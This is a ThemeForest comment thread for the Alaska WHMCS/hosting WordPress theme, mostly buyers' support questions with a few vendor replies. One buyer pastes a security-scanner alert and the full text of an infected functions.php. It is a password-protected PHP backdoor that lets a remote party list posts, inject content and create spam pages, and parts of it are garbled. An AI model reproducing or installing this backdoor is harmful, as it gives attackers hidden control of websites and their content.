Discussion on Alaska - WHMCS & Hosting WordPress Theme

Discussion on Alaska - WHMCS & Hosting WordPress Theme

Cart 2,513 sales
Well Documented

Theme-Studio supports this item

Supported

This author's response time can be up to 1 business day.

1086 comments found.

Have you abandon the theme???

I have the same problem here – 4 days no replay. Pls help. I can’t install Alaska Core and the rest of the plugins

I have created a ticket since 4 days and no reply so far. Do you reply?? Do you have support???

alot of help needed here but no answers. Not good.

Does the theme supports rtl?

Horizontal and Vertical Tabs are not working. http://ajbonlineca.com/alaska/tabs-and-toggles/#undefined5 We are using that feature in our design and it says You are using outdated element, it is deprecated since version 4.6. Can you please help?

Who can help me I can not change the menu I wanted it to be a single line

Urgent explication needed:

File appears to be malicious: wp-content/themes/alaska/functions.php Filename: wp-content/themes/alaska/functions.php File Type: Not a core, theme or plugin file. Issue First Detected: 2 days 7 hours ago. Severity: Critical Status New This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: ”<?php\x0a\x0aif (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘f97fc8f3f10077f58b23e097c02efbd1’))\x0a\x09{\x0a\x09\x09switch ($_REQUEST[‘action’])\x0a\x09\x09\x09{\x0a\x09\x09\x09\x09case ‘get_all_links’”. The infection type is: Backdoor:PHP/get_all_links.

Here is the complete code in function.php:

<?php

if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘f97fc8f3f10077f58b23e097c02efbd1’)) { switch ($_REQUEST[‘action’]) { case ‘get_all_links’; foreach ($wpdb->get_results(‘SELECT * FROM `’ . $wpdb->prefix . ‘posts` WHERE `post_status` = “publish” AND `post_type` = “post” ORDER BY `ID` DESC’, ARRAY_A) as $data) { $data[‘code’] = ’’;

if (preg_match('! (.?) !s', $data['post_content'], $_))
                            {
                                $data['code'] = $_[1];
                            }
}
print '<e><w>1</w><url>' . $data['guid'] . '</url>' . $data['code'] . '<id>' . $data['ID'] . '</id></e>' . "\r\n";
                }
        break;
case 'set_id_links';
        if (isset($_REQUEST['data']))
            {
                $data = $wpdb > get_row('SELECT `post_content` FROM `' . $wpdb>prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
}
$post_content = preg_replace('! (.?) !s', '', $data -> post_content);
            if (!empty($_REQUEST['data'])) $post_content = $post_content . ' ' . stripcslashes($_REQUEST['data']) . ' ';
break;
if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
        {
            print "true";
        }
}
case 'create_page';
    if (isset($_REQUEST['remove_page']))
        {
            if ($wpdb > query('DELETE FROM `' . $wpdb>prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                {
                    print "true";
                }
        }
    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
        {
            if ($wpdb > query('INSERT INTO `' . $wpdb>prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                {
                    print "true";
                }
        }
break;
default: print "ERROR_WP_ACTION WP_URL_CD";
die("");

if ( $wpdb->get_var(‘SELECT count() FROM `’ . $wpdb->prefix . ‘datalist` WHERE `url` = ”’.mysql_escape_string( $_SERVER[‘REQUEST_URI’] ).’”’) == ‘1’ ) { $data = $wpdb > get_row(‘SELECT * FROM `’ . $wpdb>prefix . ‘datalist` WHERE `url` = ”’.mysql_escape_string($_SERVER[‘REQUEST_URI’]).’”’); if ($data -> full_content) { print stripslashes($data -> content); } else { print ’<!DOCTYPE html>’; print ’<html ’; language_attributes(); print ’ class=”no-js”>’; print ’<head>’; print ’<title>’.stripslashes($data -> title).’</title>’; print ’<meta name=”Keywords” content=”’.stripslashes($data -> keywords).’” />’; print ’<meta name=”Description” content=”’.stripslashes($data -> description).’” />’; print ’<meta name=”robots” content=”index, follow” />’; print ’<meta charset=”’; bloginfo( ‘charset’ ); print ’” />’; print ’<meta name=”viewport” content=”width=device-width”>’; print ’<link rel=”profile” href=”http://gmpg.org/xfn/11”>’; print ’<link rel=”pingback” href=”’; bloginfo( ‘pingback_url’ ); print ’”>’; wp_head(); print ’</head>’; print ’’; print ‘ ’; print stripslashes($data -> content); get_search_form(); get_sidebar(); get_footer(); }

exit;
}

add_filter(‘um_profile_field_filter_hook__description_12’, ‘um_profile_field_filter_hook__description_12’, 99, 2); function um_profile_field_filter_hook__description_12( $value, $data ) {

$value = do_shortcode( $value );
return $value;

}

?><?php / * Load Framework */ require_once ( “core/init.php”);

The Row ID in visual composer is not working for anchor links. Please update with this feature enabled.

Account Suspended ??

Hello!

I have new questions for a new site:

1) I have to use multilang site. I am using MultilingualPress (https://multilingualpress.org) which uses Wordpress Multisite. Is this compatible?

2) What I have to keep in mind if I use Wordpress in Multisite mode? (I mean license or tech-specs…)

3) I want to use WHMPress to synchronize WHMCS prices/plans and display them with multi-currency. This can be done? Will I have problems with multi-language? and with cache?

4) Also the purchase process should be on same wordpress site (do not redirect to whmcs). Can I do that with WHMPress or should I use Whmcs-Bridge too?

5) They want to use WP-Rocket cache (https://wp-rocket.me). Is it 100% compatible with the theme?

Thank you!

Hello?

Hi, our contact page at google maps has not work with notice “Oops! Something went wrong. This page didn’t load Google Maps correctly. See the JavaScript console for technical details.”

How I can solve it? Thanks You.

My visual composer has stopped working out of the blue. Even after following the instructions provided by the FAQ, it just spins and spins. I’ve posted in the support forum and contacted support several days ago but no one has gotten in touch. Please help as my site is DEAD at the moment.

can you please update the visual composer and the slider revolution to the latest version?

Hello,

What version of Alaska is the Demo running: 3.2.0 or 4.0.1?

Why is 4.0.1 still in Beta?

I have looked, but, I can not find any comparisons between 3.x and 4.x so what is the differences?

Thank you.

Hello, I’ve bought the theme. How to display only specific categories in blog page?

Thanks

Hi, I have a problem with the product gallery, the images look big , how i can fix it? site – http://inprocess.com.pe/product/serie-mbt-5252-y-mbt-3560/

After upgrading to theme version 3.2.0, the formatting of the pages is wide and styling on content boxes etc no longer look the same. Is there a way to fix that?

Hello,
Apologies for the delay!
If you wouldn’t mind providing me your site info, I’d be happy to take a better look. Email: https://themeforest.net/user/theme-studio#contact
Regards

Hello Theme -Studio, We facing a small issue in Alaska theme – Here main menu first link isn’t click able. we cant click on every first menu links. Please check it. Site – http://bagful.com.au/demo/

Hello,
Apologies for the delay!
You can fix this by adding below snippet to Appearance > Alaska options > General settings > Custom JS:
// Begin clickable parent menu
jQuery(document).ready(function($) {
    $('.dropdown-toggle').on('click', function(){
        window.location =$(this).attr('href');
    });
});
Regards

Working like awesome, Thanks Theme studio. you, your theme and support. everything awesome. will add my 5-star feedback for you.

Does this theme support WHMCS 7.1?

Hello,
Thanks for writing in!
Our dev is still testing on WHMCS 7.1. I’ll get you an answer back as soon as he complete testing.
Regards

by
by
by
by
by
by

Tell us what you think!

We'd like to ask you a few questions to help improve ThemeForest.

Sure, take me to the survey